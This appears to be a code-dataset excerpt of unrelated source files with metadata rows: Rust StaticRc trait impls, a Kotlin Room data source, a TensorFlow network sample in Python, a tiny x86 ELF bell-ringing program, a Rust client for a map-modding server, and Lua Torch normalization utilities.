fn from(value: alloc::string::String) -> Self { Self::from(Box::from(value)) }
}
impl<T, const N: usize> From<T> for StaticRc<T, N, N> {
#[inline(always)]
fn from(value: T) -> Self { Self::from(Box::from(value)) }
}
impl<T, const N: usize> From<alloc::vec::Vec<T>> for StaticRc<[T], N, N> {
#[inline(always)]
fn from(value: alloc::vec::Vec<T>) -> Self { Self::from(Box::from(value)) }
}
impl<T, const N: usize> From<StaticRc<[T], N, N>> for alloc::vec::Vec<T> {
#[inline(always)]
fn from(value: StaticRc<[T], N, N>) -> Self { Self::from(StaticRc::into_box(value)) }
}
impl<T: ?Sized, const N: usize> From<StaticRc<T, N, N>> for alloc::rc::Rc<T> {
#[inline(always)]
fn from(value: StaticRc<T, N, N>) -> Self { Self::from(StaticRc::into_box(value)) }
}
impl<T: ?Sized, const N: usize> From<StaticRc<T, N, N>> for alloc::sync::Arc<T> {
#[inline(always)]
fn from(value: StaticRc<T, N, N>) -> Self { Self::from(StaticRc::into_box(value)) }
}
impl<const N: usize> From<StaticRc<str, N, N>> for alloc::string::String {
#[inline(always)]
fn from(value: StaticRc<str, N, N>) -> Self { Self::from(StaticRc::into_box(value)) }
}
impl<const NUM: usize, const DEN: usize> From<StaticRc<str, NUM, DEN>> for StaticRc<[u8], NUM, DEN> {
#[inline(always)]
fn from(value: StaticRc<str, NUM, DEN>) -> Self {
let pointer = value.pointer.as_ptr() as *mut [u8];
mem::forget(value);
// Safety:
// - `value.pointer` was not null, hence `pointer` is not null.
debug_assert!(!pointer.is_null());
let pointer = unsafe { NonNull::new_unchecked(pointer) };
Self { pointer }
}
}
impl<const N: usize> iter::FromIterator<StaticRc<str, N, N>> for alloc::string::String {
#[inline(always)]
fn from_iter<I: IntoIterator<Item = StaticRc<str, N, N>>>(iter: I) -> Self {
Self::from_iter(iter.into_iter().map(StaticRc::into_box))
}
}
impl<T, const N: usize> iter::FromIterator<T> for StaticRc<[T], N, N> {
#[inline(always)]
fn from_iter<I: IntoIterator<Item = T>>(iter: I) -> Self { Self::from(Box::from_iter(iter)) }
}
impl<I: iter::FusedIterator + ?Sized, const N: usize> iter::FusedIterator for StaticRc<I, N, N> {}
impl<F: ?Sized + future::Future + marker::Unpin, const N: usize> future::Future for StaticRc<F, N, N> {
type Output = F::Output;
fn poll(mut self: pin::Pin<&mut Self>, cx: &mut task::Context<'_>) -> task::Poll<Self::Output> {
F::poll(pin::Pin::new(&mut *self), cx)
}
}
#[cfg(nightly_generator_trait)]
impl<G: ?Sized + ops::Generator<R> + marker::Unpin, R, const N: usize> ops::Generator<R> for StaticRc<G, N, N> {
type Yield = G::Yield;
type Return = G::Return;
fn resume(mut self: pin::Pin<&mut Self>, arg: R) -> ops::GeneratorState<Self::Yield, Self::Return> {
G::resume(pin::Pin(&mut *self), arg)
}
}
#[cfg(nightly_generator_trait)]
impl<G: ?Sized + ops::Generator<R>, R, const N: usize> ops::Generator<R> for pin::Pin<StaticRc<G, N, N>> {
type Yield = G::Yield;
type Return = G::Return;
fn resume(mut self: pin::Pin<&mut Self>, arg: R) -> ops::GeneratorState<Self::Yield, Self::Return> {
G::resume((*self).as_mut(), arg)
}
}
impl<T: ?Sized + hash::Hash, const NUM: usize, const DEN: usize> hash::Hash for StaticRc<T, NUM, DEN> {
#[inline(always)]
fn hash<H: hash::Hasher>(&self, state: &mut H) {
Self::get_ref(self).hash(state);
}
}
impl<I: iter::Iterator + ?Sized, const N: usize> iter::Iterator for StaticRc<I, N, N> {
type Item = I::Item;
#[inline(always)]
fn next(&mut self) -> Option<I::Item> { Self::get_mut(self).next() }
#[inline(always)]
fn size_hint(&self) -> (usize, Option<usize>) { Self::get_ref(self).size_hint() }
#[inline(always)]
fn nth(&mut self, n: usize) -> Option<I::Item> { Self::get_mut(self).nth(n) }
#[inline(always)]
fn last(self) -> Option<I::Item> { Self::into_box(self).last() }
}
impl<T: ?Sized + cmp::Ord, const NUM: usize, const DEN: usize> cmp::Ord for StaticRc<T, NUM, DEN> {
#[inline(always)]
fn cmp(&self, other: &Self) -> cmp::Ordering {
if Self::ptr_eq(self, other) {
cmp::Ordering::Equal
} else {
Self::get_ref(self).cmp(Self::get_ref(other))
}
}
}
impl<T, const NUM: usize, const DEN: usize, const N: usize, const D: usize> cmp::PartialEq<StaticRc<T, N, D>>
for StaticRc<T, NUM, DEN>
where
T: ?Sized + PartialEq<T>
{
#[inline(always)]
fn eq(&self, other: &StaticRc<T, N, D>) -> bool { Self::get_ref(self).eq(StaticRc::get_ref(other)) }
#[inline(always)]
fn ne(&self, other: &StaticRc<T, N, D>) -> bool { Self::get_ref(self).ne(StaticRc::get_ref(other)) }
}
impl<T, const NUM: usize, const DEN: usize, const N: usize, const D: usize> cmp::PartialOrd<StaticRc<T, N, D>>
for StaticRc<T, NUM, DEN>
where
T: ?Sized + PartialOrd<T>
{
#[inline(always)]
fn partial_cmp(&self, other: &StaticRc<T, N, D>) -> Option<cmp::Ordering> {
Self::get_ref(self).partial_cmp(StaticRc::get_ref(other))
}
#[inline(always)]
fn lt(&self, other: &StaticRc<T, N, D>) -> bool {
Self::get_ref(self).lt(StaticRc::get_ref(other))
}
#[inline(always)]
fn le(&self, other: &StaticRc<T, N, D>) -> bool {
Self::get_ref(self).le(StaticRc::get_ref(other))
}
#[inline(always)]
fn gt(&self, other: &StaticRc<T, N, D>) -> bool {
Self::get_ref(self).gt(StaticRc::get_ref(other))
}
#[inline(always)]
fn ge(&self, other: &StaticRc<T, N, D>) -> bool {
Self::get_ref(self).ge(StaticRc::get_ref(other))
}
}
impl<T: ?Sized, const NUM: usize, const DEN: usize> fmt::Pointer for StaticRc<T, NUM, DEN> {
#[inline(always)]
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
fmt::Pointer::fmt(&Self::as_ptr(self).as_ptr(), f)
}
}
#[cfg(nightly_async_stream)]
impl<S: ?Sized + stream::Stream + marker::Unpin, const N: usize> stream::Stream for StaticRc<S, N, N> {
type Item = S::Item;
fn poll_next(mut self: pin::Pin<&mut Self>, cx: &mut task::Context<'_>) -> task::Poll<Option<Self::Item>> {
pin::Pin::new(&mut **self).poll_next(cx)
}
fn size_hint(&self) -> (usize, Option<usize>) { (**self).size_hint() }
}
impl<T: ?Sized, const NUM: usize, const DEN: usize> marker::Unpin for StaticRc<T, NUM, DEN> {}
unsafe impl<T: ?Sized + marker::Send, const NUM: usize, const DEN: usize> marker::Send for StaticRc<T, NUM, DEN> {}
unsafe impl<T: ?Sized + marker::Sync, const NUM: usize, const DEN: usize> marker::Sync for StaticRc<T, NUM, DEN> {}
| 34.127135 | 118 | 0.583097 | 3.375 |
90094aaa82be4c9b440fe850997c833182e8e5b8 | 1,575 | kt | Kotlin | app/src/main/java/tech/takenoko/cleanarchitecturex/repository/local/UserLocalDataSource.kt | TakenokoTech/CleanArchitectureX | 3fe34a5d239c7baece4de3a8416c9fd80fe129a2 | [
"MIT"
] | 3 | 2020-09-02T12:42:28.000Z | 2020-11-27T07:22:01.000Z | app/src/main/java/tech/takenoko/cleanarchitecturex/repository/local/UserLocalDataSource.kt | TakenokoTech/CleanArchitectureX | 3fe34a5d239c7baece4de3a8416c9fd80fe129a2 | [
"MIT"
] | 12 | 2019-11-28T05:56:50.000Z | 2019-12-09T16:55:35.000Z | app/src/main/java/tech/takenoko/cleanarchitecturex/repository/local/UserLocalDataSource.kt | TakenokoTech/CleanArchitectureX | 3fe34a5d239c7baece4de3a8416c9fd80fe129a2 | [
"MIT"
] | null | null | null | package tech.takenoko.cleanarchitecturex.repository.local
import androidx.annotation.MainThread
import androidx.annotation.WorkerThread
import androidx.lifecycle.LiveData
import androidx.room.ColumnInfo
import androidx.room.Entity
import androidx.room.PrimaryKey
import org.koin.core.KoinComponent
import org.koin.core.inject
import tech.takenoko.cleanarchitecturex.di.AppDatabase
import tech.takenoko.cleanarchitecturex.entities.room.UserDao
import tech.takenoko.cleanarchitecturex.utils.AppLog
class UserLocalDataSource : UserDao, KoinComponent {
private val database: AppDatabase by inject()
@WorkerThread
override suspend fun getAll(): List<User> {
return database.userDao().getAll()
}
@WorkerThread
override suspend fun insertAll(vararg users: User) {
val result = database.userDao().insertAll(*users)
AppLog.debug(TAG, "insertAll. ${users.map { it.id }}")
return result
}
@WorkerThread
override suspend fun deleteAll() {
val result = database.userDao().deleteAll()
AppLog.debug(TAG, "deleteAll.")
return result
}
@MainThread
override fun getAllToLive(): LiveData<List<User>> {
return database.userDao().getAllToLive()
}
@Entity
data class User(
@ColumnInfo(name = "userName") val userName: String,
@ColumnInfo(name = "displayName") val displayName: String,
@PrimaryKey(autoGenerate = true) val id: Int = 0
)
companion object {
private val TAG = UserLocalDataSource::class.java.simpleName
}
}
| 29.166667 | 68 | 0.711746 | 3.09375 |
f065f569bc87da0b1005e3822cbd92500b510024 | 1,713 | py | Python | netensorflow/api_samples/ann_creation_and_usage.py | psigelo/NeTensorflow | ec8bc09cc98346484d1b682a3dfd25c68c4ded61 | [
"MIT"
] | null | null | null | netensorflow/api_samples/ann_creation_and_usage.py | psigelo/NeTensorflow | ec8bc09cc98346484d1b682a3dfd25c68c4ded61 | [
"MIT"
] | null | null | null | netensorflow/api_samples/ann_creation_and_usage.py | psigelo/NeTensorflow | ec8bc09cc98346484d1b682a3dfd25c68c4ded61 | [
"MIT"
] | null | null | null | import tensorflow as tf
from netensorflow.ann.ANN import ANN
from netensorflow.ann.macro_layer.MacroLayer import MacroLayer
from netensorflow.ann.macro_layer.layer_structure.InputLayerStructure import InputLayerStructure
from netensorflow.ann.macro_layer.layer_structure.LayerStructure import LayerStructure, LayerType
from netensorflow.ann.macro_layer.layer_structure.layers.FullConnected import FullConnected
from netensorflow.ann.macro_layer.layer_structure.layers.FullConnectedWithSoftmaxLayer import FullConnectedWithSoftmaxLayer
'''
ann Creation and simple usage, the goal of this code is simply run the most simpler artificial neural network
'''
def main():
# tensorflow
tf_sess = tf.Session()
# Layers:
input_dim = [None, 3]
hidden_layer = FullConnected(inputs_amount=20)
out_layer = FullConnectedWithSoftmaxLayer(inputs_amount=10)
# Layer Structures
input_layer_structure = InputLayerStructure(input_dim)
hidden_layer_structure = LayerStructure('Hidden', layer_type=LayerType.ONE_DIMENSION, layers=[hidden_layer])
output_layer_structure = LayerStructure('Output', layer_type=LayerType.ONE_DIMENSION,layers=[out_layer])
# Macro Layer
macro_layers = MacroLayer(layers_structure=[input_layer_structure, hidden_layer_structure, output_layer_structure])
# ann
ann = ANN(macro_layers=macro_layers, tf_session=tf_sess, base_folder='./tensorboard_logs/')
ann.connect_and_initialize()
# Execute
for it in range(100):
import numpy as np
input_tensor_value = [np.random.uniform(0.0, 10.0, 3)]
print(ann.run(global_iteration=it, input_tensor_value=input_tensor_value))
if __name__ == '__main__':
main()
| 37.23913 | 123 | 0.782837 | 3.140625 |
2d99d9c46e04f30f5d758fc9de892ba87ed74e95 | 2,716 | asm | Assembly | src/test/resources/elfsamples/tiny/keepalive.asm | thingswars/johnnyriscv | 7310af27952cf9e121a2237a9478ff6c06599a8d | [
"Apache-2.0"
] | 3 | 2016-07-15T20:35:12.000Z | 2018-08-07T18:55:33.000Z | src/test/resources/elfsamples/tiny/keepalive.asm | thingswars/johnnyriscv | 7310af27952cf9e121a2237a9478ff6c06599a8d | [
"Apache-2.0"
] | null | null | null | src/test/resources/elfsamples/tiny/keepalive.asm | thingswars/johnnyriscv | 7310af27952cf9e121a2237a9478ff6c06599a8d | [
"Apache-2.0"
] | null | null | null | ;; keepalive.asm: Copyright (C) 2001 Brian Raiter <[email protected]>
;; Licensed under the terms of the GNU General Public License, either
;; version 2 or (at your option) any later version.
;;
;; To build:
;; nasm -f bin -o keepalive keepalive.asm && chmod +x keepalive
BITS 32
org 0x05426000
db 0x7F, "ELF"
dd 1
dd 0
dd $$
dw 2
dw 3
dd _start
db _start - $$
_start: pusha ; Save the current state
inc edx ; Set output length to one byte
add eax, dword 4 ; write system call number
mov ecx, esp ; Point ecx at a buffer
push ecx ; Save buffer pointer
mov [ecx], word 0x0107 ; 263 seconds, or an ASCII BEL
inc ebx ; stdout file descriptor
cmp eax, 0x00010020
int 0x80 ; 1. Lather the bell
pop ebx ; Point ebx at timespec
mov al, 162 ; nanosleep system call number
int 0x80 ; 2. Rinse for 263 seconds
popa ; Restore the saved state
jmp short _start ; 3. Repeat
;; This is how the file looks when it is read as an ELF header,
;; beginning at offset 0:
;;
;; e_ident: db 0x7F, "ELF" ; required
;; db 1 ; 1 = ELFCLASS32
;; db 0 ; (garbage)
;; db 0 ; (garbage)
;; db 0 ; (garbage)
;; db 0x00, 0x00, 0x00, 0x00 ; (unused)
;; db 0x00, 0x60, 0x42, 0x05
;; e_type: dw 2 ; 2 = ET_EXE
;; e_machine: dw 3 ; 3 = EM_386
;; e_version: dd 0x05426019 ; (garbage)
;; e_entry: dd 0x05426019 ; program starts here
;; e_phoff: dd 4 ; phdrs located here
;; e_shoff: dd 0x6651E189 ; (garbage)
;; e_flags: dd 0x000701C7 ; (unused)
;; e_ehsize: dw 0x3D43 ; (garbage)
;; e_phentsize: dw 0x20 ; phdr entry size
;; e_phnum: db 1 ; one phdr in the table
;; e_shentsize: db 0x80CD ; (garbage)
;; e_shnum: db 0xB05B ; (garbage)
;; e_shstrndx: db 0xCDA2 ; (garbage)
;;
;; This is how the file looks when it is read as a program header
;; table, beginning at offset 4:
;;
;; p_type: dd 1 ; 1 = PT_LOAD
;; p_offset: dd 0 ; read from top of file
;; p_vaddr: dd 0x05426000 ; load at this address
;; p_paddr: dd 0x00030002 ; (unused)
;; p_filesz: dd 0x05426019 ; too big, but ok
;; p_memsz: dd 0x05426019 ; equal to file size
;; p_flags: dd 4 ; 4 = PF_R
;; p_align: dd 0x6651E189 ; (garbage)
;;
;; Note that the top three bytes of the file's origin (0x60 0x42 0x05)
;; correspond to the instructions "pusha", "inc edx", and the first
;; byte of "add eax, IMM".
;;
;; The fields marked as unused are either specifically documented as
;; not being used, or not being used with 386-based implementations.
;; Some of the fields marked as containing garbage are not used when
;; loading and executing programs. Other fields containing garbage are
;; accepted because Linux currently doesn't examine then.
| 33.95 | 75 | 0.663476 | 3 |
4d888bd8eaeb4e694ab623be7221fc8438aa8e03 | 6,215 | lua | Lua | game/helpers/mahjong/logic.lua | lualcs/xsServer | dc774f9f4364b5a24924c9ce5293d7cf5265c2d4 | [
"MIT"
] | 1 | 2021-02-08T12:27:24.000Z | 2021-02-08T12:27:24.000Z | game/helpers/mahjong/logic.lua | lualcs/xsServer | dc774f9f4364b5a24924c9ce5293d7cf5265c2d4 | [
"MIT"
] | null | null | null | game/helpers/mahjong/logic.lua | lualcs/xsServer | dc774f9f4364b5a24924c9ce5293d7cf5265c2d4 | [
"MIT"
] | 1 | 2022-01-23T05:14:55.000Z | 2022-01-23T05:14:55.000Z | --[[
file:mahjongLogic.lua
desc:麻将扑克
auth:Carol Luo
]]
local ipairs = ipairs
local math = require("extend_math")
local table = require("extend_table")
local class = require("class")
local gameLogic = require("game.logic")
---@class mahjongLogic:gameLogic @麻将扑克
local logic = class(gameLogic)
local this = logic
local senum = require("mahjong.enum")
---构造函数
---@param table mahjongCompetition
function logic:ctor(table)
self._competition = table
end
---数据获取
------@param senum senum @索引
---@return table<senum,any>
function logic:getDriver(senum)
return self._competition:getDriver(senum)
end
---数据设置
------@param senum senum @索引
------@param data any @数据
function logic:setDriver(senum,data)
return self._competition:setDriver(senum,data)
end
---最大玩家
---@return mjCount
function logic:maxPlayer()
return self._competition:getMaxPlayer()
end
---保存数据
---@param senum senum @映射值
---@param data any @数据值
function logic:setData(senum,data)
self._competition:setData(senum,data)
end
---获取数据
---@return any
function logic:getData(senum)
return self._competition:getData(senum)
end
---玩家数组
---@return mahjongPlayer[]
function logic:arrPlayer()
return self._competition:getArrPlayer()
end
---剩余牌库
----@return mjCard[]
function logic:paiKu()
return self:getDriver(senum.paiKu())
end
---包含牌库
----@return mjCard[]
function logic:baoHan()
return self:getDriver(senum.baoHan())
end
---庄家玩家
---@return mahjongPlayer
function logic:zhuang()
return self:getDriver(senum.zhuang())
end
---构建牌库
---@param builds mjFill[]
function logic:gameSystemCards(builds)
local lis = {}
local map = {}
self:setDriver(senum.paiKu(),lis)
self:setDriver(senum.baoHan(),map)
---游戏辅助
---@type mahjongHelper
local help = self._hlp
for _,item in ipairs(builds) do
for value=item.start,item.close do
local card = help.getCard(item.color,value)
map[card] = true
for again=1,item.again do
table.insert(lis,card)
end
end
end
end
---系统定庄
function logic:gameSystemDingZhuang()
local zhuangs = self:getData(senum.zhuangs())
local maxseat = self:maxPlayer()
if table.empty(zhuangs) then
---随机庄家
local banker = math.random(1,maxseat)
self:setDriver(senum.zhuang(),banker)
table.insert(zhuangs,banker)
return
end
local huangs = self:getData(senum.huangs())
if table.last(huangs) then
---慌庄连庄
local banker = table.last(zhuangs)
self:setDriver(senum.zhuang(),banker)
table.insert(zhuangs,banker)
return
end
---首胡坐庄|点炮多响
local banker = self:getData(senum.dingZhuang())
self:setDriver(senum.zhuang(),banker)
table.insert(zhuangs,banker)
end
---系统发牌
function logic:gameSystemFapai()
local users = self:arrPlayer()
local cards = self:paiKu()
for _,player in ipairs(users) do
local hands = player:getHands()
for again=1,13 do
local card = table.remove(cards)
table.insert(hands,card)
end
end
local player = self:banker()
--庄家摸牌
self:gameSystemMoPai(player)
end
---摸牌操作
---@param player mahjongPlayer
function logic:gameSystemMoPai(player)
local hands = player:getHands()
local card = table.remove(self:paiKu())
table.insert(hands,card)
end
---出牌
---@param player mahjongPlayer @麻将玩家
---@return boolean
function logic:ableChuPai(player)
local hands = player:getHands()
--检查数量
local count = #hands
if 2 ~= count % 3 then
return false
end
return true
end
---碰牌
---@param player mahjongPlayer @麻将玩家
---@return boolean
function logic:ablePengPai(player)
local hands = player:getHands()
--检查玩家
if player == self._last_chupai_play then
return false
end
--检查数量
local count = #hands
if 1 ~= count % 3 then
return false
end
--检查出牌
local card = self._last_chupai_card
if not table.existCount(hands,card,2) then
return false
end
return true
end
---直杠
---@param player mahjongPlayer @麻将玩家
---@return boolean
function logic:ableZhiGang(player)
local hands = player:getHands()
--检查玩家
if player == self._last_chupai_play then
return false
end
--检查数量
local count = #hands
if 1 ~= count % 3 then
return false
end
--检查出牌
local card = self._last_chupai_card
if not table.existCount(hands,card,3) then
return false
end
return true
end
local copy1 = {nil}
---绕杠
---@param player mahjongPlayer @麻将玩家
---@return boolean
function logic:ableRaoGang(player)
local hands = player:getHands()
--检查数量
local count = #hands
if 2 ~= count % 3 then
return false
end
--检查绕杠
local list = table.clear(copy1)
local pengs = player:getPengs()
for _,card in ipairs(pengs) do
if table.exist(hands,card) then
table.insert(list,card)
end
end
local ok = not table.empty(list)
return ok,list
end
local copy1 = {nil}
local copy2 = {nil}
---暗杠
---@param player mahjongPlayer @麻将玩家
---@return boolean
function logic:ableAnGang(player)
local hands = player:getHands()
--检查数量
local count = #hands
if 2 ~= count % 3 then
return false
end
--检查暗杠
local list = table.clear(copy1)
local maps = table.arrToHas(hands,copy2)
for card,count in ipairs(maps) do
if count >= 4 then
table.insert(list,card)
end
end
local ok = not table.empty(list)
return ok,list
end
---点炮
---@param player mahjongPlayer @麻将玩家
---@return boolean
function logic:ableDianPao(player)
end
---抢杠
---@param player mahjongPlayer @麻将玩家
---@return boolean
function logic:ableQiangGang(player)
end
---自摸
---@param player mahjongPlayer @麻将玩家
---@return boolean
function logic:ableZiMo(player)
end
---出牌操作
---@param player mahjongPlayer @玩家
---@param card mjCard @出牌
function logic:gamePlayingChuPai(player,card)
---最后出牌
---@type mjCard
self._last_chupai_card = card
---出牌玩家
---@type mahjongPlayer
self._last_chupai_play = player
end
return logic | 20.57947 | 55 | 0.651167 | 3.15625 |
6fe07f6bbcf564bf1355bbc028f03e5afbd1aeaa | 8,829 | rs | Rust | binary/src/cli/remote.rs | iiYese/OMFG | 38162bdc322de53d50bb34abc6fd244636694cb7 | [
"MIT"
] | null | null | null | binary/src/cli/remote.rs | iiYese/OMFG | 38162bdc322de53d50bb34abc6fd244636694cb7 | [
"MIT"
] | null | null | null | binary/src/cli/remote.rs | iiYese/OMFG | 38162bdc322de53d50bb34abc6fd244636694cb7 | [
"MIT"
] | null | null | null | use std::{
io::{Write, Read},
fs::{File, rename}, path::{Path, PathBuf},
env::current_exe
};
use reqwest::{
StatusCode,
blocking::{Client, multipart::Form}
};
use serde::{Serialize, Deserialize};
use anyhow::{Context, anyhow, bail, Result as AnyHow};
use mac_address::get_mac_address;
use short_crypt::ShortCrypt;
use crate::utils::{PathBufExt, DebugPrint};
use super::*;
#[derive(Serialize, Deserialize)]
struct Credentials {
email: String,
access_key: String,
}
pub struct ClientHandle {
client: Client,
server: String,
credentials: Credentials,
}
impl ClientHandle {
fn crypt() -> AnyHow<ShortCrypt> {
let crypt = ShortCrypt::new(
get_mac_address()?
.ok_or(anyhow!("Could not get key for encryption"))?
.to_string()
);
Ok(crypt)
}
pub fn save_credentials(email: &str, access_key: &str) -> AnyHow<()> {
let crypt = Self::crypt()?;
let credentials = Credentials {
email: email.to_string(),
access_key: access_key.to_string()
};
let (base, credentials) = crypt.encrypt(&serde_json::to_string(&credentials)?);
let path = current_exe()?
.parent()
.context("Could not get parent directory")?
.to_path_buf()
.join("credentials");
path.write_plus("")?;
let mut file = File::create(path)
.map_err(|e| anyhow!("Failed to open credentials file: {}", e))?;
file.write_all(&[&[base], credentials.as_slice()].concat())
.map_err(|e| anyhow!("Failed to write credentials: {}", e))
}
pub fn new(server: &str) -> AnyHow<Self> {
let credential_path = current_exe()?
.parent()
.context("Could not get parent directory")?
.to_path_buf()
.join("credentials");
let f = File::open(credential_path)?;
let mut reader = std::io::BufReader::new(f);
let mut contents = Vec::new();
// Read file into vector.
reader.read_to_end(&mut contents)?;
let crypt = Self::crypt()?;
if contents.len() < 2 {
bail!("Corrupt credentials file");
}
let contents = crypt
.decrypt(&(contents[0], contents[1..].to_vec()))
.map_err(|e| anyhow!("Could not decrypt credentials: {}", e))?;
Ok(
ClientHandle {
client: Client::new(),
server: server.to_string(),
credentials: serde_json::from_str(std::str::from_utf8(contents.as_slice())?)?
}
)
}
pub fn list_projects(&self) -> AnyHow<()>{
let resp: ProjectList = self
.client
.post(&format!("{}/list_projects", self.server))
.basic_auth(&self.credentials.email, Some(&self.credentials.access_key))
.send()?
.json()?;
println!(
"{:#?}",
resp.extract()?
);
Ok(())
}
pub fn create_project(&self) -> AnyHow<String> {
let resp: CreateProj = self
.client
.post(&format!("{}/create_project", self.server))
.basic_auth(&self.credentials.email, Some(&self.credentials.access_key))
.send()?
.json()?;
let id = resp.extract()?;
println!("{}", id);
Ok(id)
}
pub fn delete_project(&self, map_id: &str) -> AnyHow<()> {
let resp: GenericResponse = self
.client
.post(&format!("{}/delete_project/{}", self.server, map_id))
.basic_auth(&self.credentials.email, Some(&self.credentials.access_key))
.send()?
.json()?;
resp.ok()
}
pub fn get_status(&self, map_id: &str) -> AnyHow<()> {
let resp: ModdingStatus = self
.client
.post(&format!("{}/modding_status/{}", self.server, map_id))
.send()?
.json()?;
println!("{}", resp.status);
Ok(())
}
fn change_modding(&self, map_id: &str, to: &str) -> AnyHow<()> {
let resp: GenericResponse = self
.client
.post(&format!("{}/{}_modding/{}", self.server, to, map_id))
.basic_auth(&self.credentials.email, Some(&self.credentials.access_key))
.send()?
.json()?;
resp.ok()
// query server again to get new status
}
pub fn try_open(&self, map_id: &str) -> AnyHow<()> {
self.change_modding(map_id, "open")
}
pub fn try_close(&self, map_id: &str) -> AnyHow<()> {
self.change_modding(map_id, "close")
}
pub fn check_upto_date(&self, map_id: &str, sum: u32) -> AnyHow<()> {
let resp: Checksum = self
.client
.get(&format!("{}/get_checksum/{}", self.server, map_id))
.send()?
.json()?;
if resp.sum != sum {
println!("Checksum mismatch");
}
println!("ok");
Ok(())
}
pub fn submit_map(&self, map_id: &str, path: &Path) -> AnyHow<()> {
let resp: GenericResponse = self
.client
.post(&format!("{}/update_map/{}", self.server, map_id))
.basic_auth(&self.credentials.email, Some(&self.credentials.access_key))
.multipart(Form::new().file("file", path)?)
.send()?
.json()?;
resp.ok()
}
pub fn fetch_project(&self, map_id: &str) -> AnyHow<Vec<u8>> {
let resp = self
.client
.post(&format!("{}/sync/{}", self.server, map_id))
.basic_auth(&self.credentials.email, Some(&self.credentials.access_key))
.send()?;
match resp.status() {
StatusCode::OK => {
let bytes = resp.bytes()?;
Ok(bytes.to_vec())
},
StatusCode::NOT_FOUND => {
bail!("Project not found");
},
_ => {
bail!("Failed to fetch project");
}
}
}
pub fn submit_mods(&self, map_id: &str, mod_paths: &[PathBuf]) -> AnyHow<()> {
let zip_path = current_exe()?
.parent()
.context("Could not get parent directory")?
.to_path_buf()
.join("temp");
let file = File::create(&zip_path)?;
let mut zip = zip::ZipWriter::new(file);
let options = zip::write::FileOptions::default();
for path in mod_paths {
let name = path
.file_name()
.context("Could not get file name")?
.to_str()
.context("Could not convert to string")?;
zip.start_file(name, options)?;
zip.write_all(path.read()?.as_bytes())?;
}
zip.finish()?;
let resp: ModSubmission = self
.client
.post(&format!("{}/submit_mods/{}", self.server, map_id))
.basic_auth(&self.credentials.email, Some(&self.credentials.access_key))
.multipart(Form::new().file("zip_file", &zip_path)?)
.send()?
.json()?;
let new_ids = resp.ok()?;
for path in mod_paths {
let old = path
.file_name()
.context("Could not get file name")?
.to_str()
.context("Could not convert to string")?;
let new = path.parent()
.context("Could not get parent directory")?
.to_path_buf()
.join(&new_ids[old]);
rename(path, &new)?;
}
Ok(())
}
pub fn submit_patches(&self, map_id: &str, temp_path: &Path, patched: Vec<String>) -> AnyHow<()> {
let zip_path = current_exe()?
.parent()
.context("Could not get parent directory")?
.to_path_buf()
.join("temp");
let file = File::create(&zip_path)?;
let mut zip = zip::ZipWriter::new(file);
let options = zip::write::FileOptions::default();
zip.start_file("map_file", options)?;
zip.write_all(temp_path.to_path_buf().read()?.as_bytes())?;
zip.start_file("changes.json", options)?;
let changes_json = serde_json::to_string(&Patches{ patched })?;
zip.write_all(changes_json.as_bytes())?;
zip.finish()?;
let resp: GenericResponse = self.client
.post(&format!("{}/patch_mods/{}", self.server, map_id))
.basic_auth(&self.credentials.email, Some(&self.credentials.access_key))
.multipart(Form::new().file("zip_file", zip_path)?)
.send()?
.json()?;
resp.ok()
}
}
| 29.235099 | 102 | 0.508891 | 3.125 |
1410c372222c2ae5c4ad890f48fd7478a98bef6f | 5,255 | lua | Lua | torch_lua/src/util/torch_util.lua | migushu/rul-1 | a25f8a21ab978cfef2826ed7918de6dccaaa1c22 | [
"MIT"
] | 17 | 2017-11-22T19:14:49.000Z | 2021-11-09T07:22:52.000Z | torch_lua/src/util/torch_util.lua | johnsbuck/rul | a25f8a21ab978cfef2826ed7918de6dccaaa1c22 | [
"MIT"
] | null | null | null | torch_lua/src/util/torch_util.lua | johnsbuck/rul | a25f8a21ab978cfef2826ed7918de6dccaaa1c22 | [
"MIT"
] | 4 | 2018-11-19T01:35:56.000Z | 2020-02-17T05:47:07.000Z | ----------------------------------------------------------------------
-- A utility module containing Torch-based functions for editing
-- tensors, normalization, and other purposes.
-- @author John Bucknam
-- @license MIT
-- @module Torch-Utilities
----------------------------------------------------------------------
require 'torch'
----------------------------------------------------------------------
-- Matrix Utilities
-- @section matrix-utilities
----------------------------------------------------------------------
---
-- Measures the covariance between 2 tensors with 1-D data vectors.
-- @tensor x
-- @tensor y
-- @treturn number The covariance of x and y
function rutil.cov(x, y)
local len = x:size()[1]
local covariance = 0
for i=1, len do
local a = x[i] - x:mean()
local b = y[i] - y:mean()
covariance = covariance + (a*b)/len
end
return covariance
end
---
-- Creates a covariance matrix for a given tensor.
-- @tensor X
-- @treturn tensor A 2-D matrix with matrix[i][j] corresponding to cov(i,j)
function rutil.cov_matrix(X)
local len = X:size()[2]
local matrix = torch.Tensor(len,len)
for i=1, len do
print("I: ", i)
for j=1, len do
print("J: ", j)
matrix[i][j] = rutil.cov(X[{{},i}], X[{{},j}])
end
end
return matrix
end
---
-- Measures the correlation between 2 tensors with 1-D data vectors.
-- @tensor x
-- @tensor y
-- @treturn number The correlation of x and y
function rutil.corr(x,y)
local correlation = 0
return rutil.cov(x,y)/(x:std()*y:std())
end
----------------------------------------------------------------------
-- Normalization
-- @section normalization
----------------------------------------------------------------------
---
-- Subtracts each point of a given
-- tensor by the minimum and divides by
-- the difference between the maximum
-- and minimum.
--
-- Feature Scaling Formula: (x - Low_X)/(High_X - Low_X)
--
-- @tensor data Vectors in given Tensor
-- @treturn tensor Scaled tensor based on minimum and maximum
function rutil.scale_features(data)
local info = data:clone()
-- Feature Scaling
if #info:size() > 1 then
for i=1, info:size()[2] do
local min = info[{{},i}]:min()
local max = info[{{},i}]:max()
if max ~= min then
info[{{},i}]:add(-min)
info[{{},i}]:div(max-min)
else
info[{{},i}]:add(-min+1)
end
end
else
local min = info:min()
local max = info:max()
if max ~= min then
info:add(-min)
info:div(max-min)
else
info[{{},i}]:add(-min+1)
end
end
return info
end
---
-- Takes an existing tensor and subtracts each value by its column's
-- mean. Afterwards, it divides itself by its standard deviation.
--
-- Standardization Formula: (x - MEAN) / STD
--
-- @tensor data A Torch tensor containing data to be normalized.
-- @treturn tensor A normalized Torch tensor of the same type as data.
function rutil.standardize(data)
local info = data:clone()
-- Standardization
if #info:size() > 1 then
MEAN = {}
STD = {}
for i=1, info:size()[#info:size()] do
MEAN[i] = info[{{},i}]:mean()
STD[i] = info[{{},i}]:std()
info[{{},i}]:add(-info[{{},i}]:mean())
info[{{},i}]:div(info[{{},i}]:std())
end
else
MEAN = info:mean()
STD = info:std()
info:add(-info:mean())
info:div(info:std())
end
return info
end
---
